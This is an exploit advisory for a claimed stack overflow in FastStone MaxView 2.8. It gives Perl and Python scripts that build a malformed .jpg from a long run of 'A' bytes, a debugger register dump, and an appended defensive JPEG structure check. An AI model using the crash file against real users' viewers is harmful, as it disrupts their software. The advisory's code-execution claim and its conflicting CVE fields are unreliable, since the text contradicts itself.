FastStone MaxView 2.8 (.jpg) local Stack Overflow PoC

2015.07.02
Credit: Dr.3v1l
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#########################################
# Title : FastStone MaxView 2.8 (.jpg) local Stack Overflow PoC
# Program : FastStone MaxView
# Author : Dr.3v1l
# Date : 2015 01 July
# Website : http://www.faststone.org
# Download : http://www.faststonesoft.net/DN/FSMaxViewSetup28.exe
# Version : 2.8
# Type : (.jpg File) local Stack Overflow PoC
##########################################
#
# 01. Vulnerability Information
#
# Class: Buffer overflow [CWE-119]
# Impact: Code execution
# Remotely Exploitable: No
# Locally Exploitable: Yes
# CVE Name: CVE-2014-8386
#
# 02. Technical Description / Proof of Concept Code
#
# This vulnerability is caused by a stack buffer overflow when parsing
# the display properties parameter. A malicious third party could trigger
# execution of arbitrary code within the context of the application, or
# otherwise crash the whole application.
#
# EAX 54A30018 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# ECX 0013D2A8
# EDX 7767D370 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 0013D2A8
# EBP 0013D30C
# ESI 0013D328
# EDI 000007A4
# EIP 7767D370 ntdll.KiFastSystemCallRet
# C 0 ES 0023 32bit 0(FFFFFFFF)
# P 1 CS 001B 32bit 0(FFFFFFFF)
# A 0 SS 0023 32bit 0(FFFFFFFF)
# Z 1 DS 0023 32bit 0(FFFFFFFF)
# S 0 FS 003B 32bit 7FFDF000(4000)
# T 0 GS 0000 NULL
# D 0
# O 0 LastErr ERROR_SUCCESS (00000000)
# EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
# ST0 empty -??? FFFF 000000FF 00FF00FF
# ST1 empty 4.7021112344749837450e+18
# ST2 empty 4.7021112344749837450e+18
# ST3 empty 4.7021112344749837450e+18
# ST4 empty 4.7021112344749837450e+18
# ST5 empty 4.7021112344749837450e+18
# ST6 empty 4.7021112344749837450e+18
# ST7 empty 4.7021112344749837450e+18
# 3 2 1 0 E S P U O Z D I
# FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
# FCW 127F Prec NEAR,53 Mask 1 1 1 1 1 1
#
# ---------------------------------------------------------------------
#
# PoC (PERL) :
#
# my $file="3v1l.jpg";
# open(my $FILE, ">>$file") or die "Cannot open $file: $!";
# print $FILE "\x41" x 250000000;
# close($FILE);
# print "$file has been created \n";
#
#
# PoC (PYTHON) :
#
# file="3v1l.jpg"
# junk="\x41"*250000000
# writeFile = open (file, "w")
# writeFile.write(junk)
# writeFile.close()
#
#######################################################################
#
# [+] Contact Me :
#
# B.Devils.B@gmail.com
# Twitter.com/Doctor_3v1l
# Twitter.com/blackdevilsb0ys
# Facebook.com/blackdevilsb0ys
# Linkedin.com/in/hossein3v1l
# Hossein Hezami - Black_Devils B0ys
#
#######################################################################
# Black_Devils B0ys - blackdevilsb0ys.ir
#######################################################################
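
A defensive pre-screen for files named .jpg, added here as an example and not part of the original advisory: it checks the size, the SOI marker and the segment chain, so a file shaped like the PoC above (a long run of 0x41 bytes with no JPEG structure) is rejected before it reaches an image viewer. The function names, the `MAX_SIZE` limit and the sample byte strings are assumptions constructed for illustration.

```python
import os
import struct

STANDALONE = {0x01} | set(range(0xD0, 0xD8))  # TEM, RST0-RST7: no length field
MAX_SIZE = 64 * 1024 * 1024  # assumed policy limit, not taken from the advisory

def check_jpeg_structure(data: bytes) -> str:
    """Return 'ok' or the reason the bytes are not a plausible JPEG stream."""
    if data[:2] != b"\xff\xd8":
        return "missing SOI marker"
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            return f"expected marker at offset {pos}"
        while pos < len(data) and data[pos] == 0xFF:  # skip fill bytes
            pos += 1
        if pos >= len(data):
            return "truncated marker"
        marker, pos = data[pos], pos + 1
        if marker == 0xD9:
            return "EOI before any scan data"
        if marker in STANDALONE:
            continue
        if pos + 2 > len(data):
            return "truncated segment length"
        (seglen,) = struct.unpack(">H", data[pos:pos + 2])
        # The length field counts its own two bytes and must fit in the file.
        if seglen < 2 or pos + seglen > len(data):
            return f"bad segment length at offset {pos}"
        pos += seglen
        if marker == 0xDA:  # SOS: entropy-coded data runs until EOI
            return "ok" if data.find(b"\xff\xd9", pos) != -1 else "missing EOI marker"
    return "no SOS segment"

def screen_file(path: str) -> str:
    """Size-check, then structure-check, a file before it reaches a viewer."""
    if os.path.getsize(path) > MAX_SIZE:
        return "file exceeds size limit"
    with open(path, "rb") as fh:
        return check_jpeg_structure(fh.read())

# Constructed samples: a minimal well-formed stream and a PoC-shaped run of 0x41.
GOOD = (b"\xff\xd8" + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00" + bytes(9)
        + b"\xff\xda" + struct.pack(">H", 8) + bytes(6) + b"\x12\x34" + b"\xff\xd9")
POC_SHAPED = b"\x41" * 4096

if __name__ == "__main__":
    for name, blob in (("good", GOOD), ("poc-shaped", POC_SHAPED)):
        print(name, "->", check_jpeg_structure(blob))
```

The check validates container structure only; it does not decode image data, so it complements rather than replaces updating the viewer.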

References:

http://www.faststonesoft.net/DN/FSMaxViewSetup28.exe

